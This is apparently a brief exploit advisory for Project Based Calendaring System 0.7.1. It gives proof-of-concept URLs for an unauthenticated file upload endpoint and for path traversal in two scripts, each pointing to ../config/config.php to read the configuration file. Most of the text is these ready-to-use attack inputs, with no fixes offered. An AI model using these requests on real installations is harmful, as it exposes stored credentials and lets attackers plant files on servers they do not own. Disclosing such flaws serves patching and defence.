Project Based Calendaring System (PBCS) version 0.7.1 suffers from remote file upload and remote file disclosure vulnerabilities.
9c1798634ac52cc0585e135861a1c3530a8bbf5e6c5435988633ccfd6a85149e
Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc :
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php